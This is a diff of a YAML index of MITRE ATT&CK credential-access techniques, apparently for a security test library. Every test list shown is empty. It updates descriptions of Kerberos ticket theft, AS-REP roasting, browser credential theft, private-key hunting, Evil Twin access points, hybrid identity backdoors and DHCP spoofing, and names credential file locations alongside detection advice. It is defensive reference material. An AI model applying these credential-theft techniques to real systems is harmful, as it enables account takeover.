+        url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1558.004:
+    technique:
+      modified: '2024-10-15T15:32:07.850Z'
       name: 'Steal or Forge Kerberos Tickets: AS-REP Roasting'
       description: "Adversaries may reveal credentials of accounts that have disabled
         Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002)
@@ -44942,6 +45615,13 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Yossi Nisani, Cymptom
+      - James Dunn, @jamdunnDFW, EY
+      - Swapnil Kumbhar
+      - Jacques Pluviose, @Jacqueswildy_IT
+      - Dan Nutting, @KerberToast
+      x_mitre_deprecated: false
       x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
         TGS service ticket requests. Particularly investigate irregular patterns of
         activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within
@@ -44949,32 +45629,68 @@ credential-access:
         pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking
         Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation:
         Microsoft 4768 TGT 2017)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Credential Request'
-      x_mitre_permissions_required:
-      - User
       x_mitre_system_requirements:
       - Valid domain account
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+      created: '2020-08-24T13:43:00.028Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1558/004
+        external_id: T1558.004
+      - source_name: Microsoft Detecting Kerberoasting Feb 2018
+        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+          using Azure Security Center. Retrieved March 23, 2018.
+        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
+      - source_name: Harmj0y Roasting AS-REPs Jan 2017
+        description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved September
+          23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/roasting-as-reps/
+      - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
+        description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
+          with AS-REP Roasting. Retrieved August 24, 2020.
+        url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
+      - source_name: SANS Attacking Kerberos Nov 2014
+        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+          Guard Dog of Hades. Retrieved March 22, 2018.
+        url: https://redsiege.com/kerberoast-slides
+      - source_name: AdSecurity Cracking Kerberos Dec 2015
+        description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
+          Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
+          Domain. Retrieved March 22, 2018.
+        url: https://adsecurity.org/?p=2293
+      - source_name: Microsoft 4768 TGT 2017
+        description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
+          ticket (TGT) was requested. Retrieved August 24, 2020.'
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
+      - source_name: Microsoft Kerberos Preauth 2014
+        description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
+          It Should Not Be Disabled. Retrieved August 25, 2020.'
+        url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1558.004
     atomic_tests: []
   T1558:
     technique:
-      modified: '2024-03-01T16:58:02.395Z'
+      modified: '2024-09-17T19:49:11.455Z'
       name: Steal or Forge Kerberos Tickets
       description: |
         Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting.  Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.
 
         On Windows, the built-in <code>klist</code> utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)
-
-        Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in <code>/var/lib/sss/secrets/secrets.ldb</code> as well as the corresponding key located in <code>/var/lib/sss/secrets/.secrets.mkey</code>. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)
-
-
-        Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the <code>/etc/krb5.conf</code> configuration file and the <code>KRB5CCNAME</code> environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using <code>kinit</code>, <code>klist</code>, <code>ktutil</code>, and <code>kcc</code> built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
@@ -45010,7 +45726,7 @@ credential-access:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Logon Session: Logon Session Metadata'
@@ -45035,13 +45751,6 @@ credential-access:
         description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
           using Azure Security Center. Retrieved March 23, 2018.
         url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-      - source_name: Kekeo
-        description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
-        url: https://github.com/gentilkiwi/kekeo
-      - source_name: SpectorOps Bifrost Kerberos macOS 2019
-        description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
-          Retrieved October 6, 2021.
-        url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
       - source_name: Medium Detecting Attempts to Steal Passwords from Memory
         description: French, D. (2018, October 2). Detecting Attempts to Steal Passwords
           from Memory. Retrieved October 11, 2019.
@@ -45050,14 +45759,6 @@ credential-access:
         description: Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket
           Attacks. Retrieved February 27, 2020.
         url: https://blog.stealthbits.com/detect-pass-the-ticket-attacks
-      - source_name: macOS kerberos framework MIT
-        description: Massachusetts Institute of Technology. (2007, October 27). Kerberos
-          for Macintosh Preferences Documentation. Retrieved October 6, 2021.
-        url: http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html
-      - source_name: MIT ccache
-        description: 'Massachusetts Institute of Technology. (n.d.). MIT Kerberos
-          Documentation: Credential Cache. Retrieved October 4, 2021.'
-        url: https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html
       - source_name: AdSecurity Cracking Kerberos Dec 2015
         description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
           Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
@@ -45079,23 +45780,14 @@ credential-access:
         description: Sean Metcalf. (2014, September 12). Kerberos, Active Directory’s
           Secret Decoder Ring. Retrieved February 27, 2020.
         url: https://adsecurity.org/?p=227
-      - source_name: Brining MimiKatz to Unix
-        description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
-          Mimikatz et al to UNIX. Retrieved October 13, 2021.
-        url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
-      - source_name: Linux Kerberos Tickets
-        description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
-          Teams. Retrieved October 4, 2021.
-        url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555:
     technique:
-      modified: '2024-02-26T14:19:09.417Z'
+      modified: '2024-10-15T14:57:46.850Z'
       name: Credentials from Password Stores
       description: 'Adversaries may search for common password storage locations to
         obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored
@@ -45146,12 +45838,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555
     atomic_tests: []
   T1552:
     technique:
-      modified: '2024-04-15T21:33:12.892Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Unsecured Credentials
       description: 'Adversaries may search compromised systems to find and obtain
         insecurely stored credentials. These credentials can be stored and/or misplaced
@@ -45163,6 +45854,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Austin Clark, @c2defense
       x_mitre_deprecated: false
@@ -45177,18 +45869,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Access'
       - 'Application Log: Application Log Content'
@@ -45211,37 +45903,115 @@ credential-access:
         url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      identifier: T1552
+    atomic_tests: []
+  T1557.004:
+    technique:
+      modified: '2024-11-11T18:52:53.686Z'
+      name: Evil Twin
+      description: "Adversaries may host seemingly genuine Wi-Fi access points to
+        deceive users into connecting to malicious networks as a way of supporting
+        follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+        [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+        or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+        ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+        network, fraudulent Wi-Fi access points may trick devices or users into connecting
+        to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+        evil twin)  Adversaries may provide a stronger signal strength or block access
+        to Wi-Fi access points to coerce or entice victim devices into connecting
+        to malicious networks.(Citation: specter ops evil twin)  A Wi-Fi Pineapple
+        – a network security auditing and penetration testing tool – may be deployed
+        in Evil Twin attacks for ease of use and broader range. Custom certificates
+        may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+        may also listen for client devices sending probe requests for known or previously
+        connected networks (Preferred Network Lists or PNLs). When a malicious access
+        point receives a probe request, adversaries can respond with the same SSID
+        to imitate the trusted, known network.(Citation: specter ops evil twin)  Victim
+        devices are led to believe the responding access point is from their PNL and
+        initiate a connection to the fraudulent network.\n\nUpon logging into the
+        malicious Wi-Fi access point, a user may be directed to a fake login page
+        or captive portal webpage to capture the victim’s credentials. Once a user
+        is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+        network activity, manipulate data, or steal additional credentials. Locations
+        with high concentrations of public Wi-Fi access, such as airports, coffee
+        shops, or libraries, may be targets for adversaries to set up illegitimate
+        Wi-Fi access points. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - DeFord L. Smith
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      type: attack-pattern
+      id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+      created: '2024-09-17T14:27:40.947Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1557/004
+        external_id: T1557.004
+      - source_name: Kaspersky evil twin
+        description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+          them. Retrieved September 17, 2024.
+        url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+      - source_name: medium evil twin
+        description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+          Attack. Retrieved September 17, 2024.
+        url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+      - source_name: specter ops evil twin
+        description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+          Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+          17, 2024.
+        url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+      - source_name: Australia ‘Evil Twin’
+        description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+          WiFi attack on plane. Retrieved September 17, 2024.
+        url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      identifier: T1552
     atomic_tests: []
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -45249,9 +46019,9 @@ credential-access:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -45260,21 +46030,22 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -45314,55 +46085,10 @@ credential-access:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Ryan Benson, Exabeam
-      - Barry Shteiman, Exabeam
-      - Sylvain Gil, Exabeam
-      - RedHuntLabs, @redhuntlabs
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
-      type: attack-pattern
-      created: '2020-02-12T18:57:36.041Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1555.003
-        url: https://attack.mitre.org/techniques/T1555/003
-      - source_name: Talos Olympic Destroyer 2018
-        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
-        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
-          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
-      - source_name: Microsoft CryptUnprotectData April 2018
-        url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
-        description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
-          June 18, 2019.
-      - source_name: Proofpoint Vega Credential Stealer May 2018
-        url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
-        description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
-          in targeted campaign . Retrieved June 18, 2019.
-      - source_name: FireEye HawkEye Malware July 2017
-        url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
-        description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
-          Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
-          2019.
-      - source_name: GitHub Mimikittenz July 2016
-        url: https://github.com/putterpanda/mimikittenz
-        description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
-          Retrieved June 20, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-15T14:13:45.294Z'
       name: 'Credentials from Password Stores: Credentials from Web Browsers'
       description: "Adversaries may acquire credentials from web browsers by reading
         files specific to the target browser.(Citation: Talos Olympic Destroyer 2018)
@@ -45392,6 +46118,12 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Ryan Benson, Exabeam
+      - Barry Shteiman, Exabeam
+      - Sylvain Gil, Exabeam
+      - RedHuntLabs, @redhuntlabs
+      x_mitre_deprecated: false
       x_mitre_detection: 'Identify web browser files that contain credentials such
         as Google Chrome’s Login Data database file: <code>AppData\Local\Google\Chrome\User
         Data\Default\Login Data</code>. Monitor file read events of web browser files
@@ -45401,23 +46133,58 @@ credential-access:
         reading web browser process memory, utilizing regular expressions, and those
         that contain numerous keywords for common web applications (Gmail, Twitter,
         Office365, etc.).'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Access'
       - 'File: File Access'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
+      created: '2020-02-12T18:57:36.041Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1555/003
+        external_id: T1555.003
+      - source_name: GitHub Mimikittenz July 2016
+        description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
+          Retrieved June 20, 2019.
+        url: https://github.com/putterpanda/mimikittenz
+      - source_name: Talos Olympic Destroyer 2018
+        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+      - source_name: Microsoft CryptUnprotectData April 2018
+        description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
+          June 18, 2019.
+        url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
+      - source_name: Proofpoint Vega Credential Stealer May 2018
+        description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
+          in targeted campaign . Retrieved June 18, 2019.
+        url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
+      - source_name: FireEye HawkEye Malware July 2017
+        description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
+          Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
+          2019.
+        url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1555.003
     atomic_tests: []
   T1557.003:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-09-12T19:46:04.759Z'
       name: DHCP Spoofing
       description: "Adversaries may redirect network traffic to adversary-owned systems
         by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -45454,23 +46221,23 @@ credential-access:
         phase_name: credential-access
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Alex Spivakovsky, Pentera
+      - Andrew Allen, @whitehat_zero
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
         involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
         monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
         specify that the IP allocations are low or have run out; these EIDs may indicate
         a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Alex Spivakovsky, Pentera
-      - Andrew Allen, @whitehat_zero
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -45503,21 +46270,20 @@ credential-access:
       - source_name: solution_monitor_dhcp_scopes
         description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
           and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
-          March 7, 2022.'
-        url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+          September 12, 2024.'
+        url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
       - source_name: w32.tidserv.g
         description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
           14, 2022.
         url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1552.004:
     technique:
-      modified: '2023-04-12T23:52:08.194Z'
+      modified: '2024-10-04T11:31:56.622Z'
       name: 'Unsecured Credentials: Private Keys'
       description: "Adversaries may search for private key certificate files on compromised
         systems for insecurely stored credentials. Private cryptographic keys and
@@ -45528,7 +46294,7 @@ credential-access:
         as <code>~/.ssh</code> for SSH keys on * nix-based systems or <code>C:&#92;Users&#92;(username)&#92;.ssh&#92;</code>
         on Windows. Adversary tools may also search compromised systems for file extensions
         relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation:
-        Palo Alto Prince of Persia)\n\nWhen a device is registered to Azure AD, a
+        Palo Alto Prince of Persia)\n\nWhen a device is registered to Entra ID, a
         device key and a transport key are generated and used to verify the device’s
         identity.(Citation: Microsoft Primary Refresh Token) An adversary with access
         to the device may be able to export the keys in order to impersonate the device.(Citation:
@@ -45562,7 +46328,7 @@ credential-access:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.1'
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Access'
@@ -45590,7 +46356,7 @@ credential-access:
       - source_name: Kaspersky Careto
         description: Kaspersky Labs. (2014, February 11). Unveiling “Careto” - The
           Masked APT. Retrieved July 5, 2017.
-        url: https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
+        url: https://web.archive.org/web/20141031134104/http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
       - source_name: Microsoft Primary Refresh Token
         description: Microsoft. (2022, September 9). What is a Primary Refresh Token?.
           Retrieved February 21, 2023.
@@ -45601,14 +46367,13 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Public-key_cryptography
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.004
     atomic_tests: []
   T1557.001:
     technique:
-      modified: '2023-04-25T14:00:00.188Z'
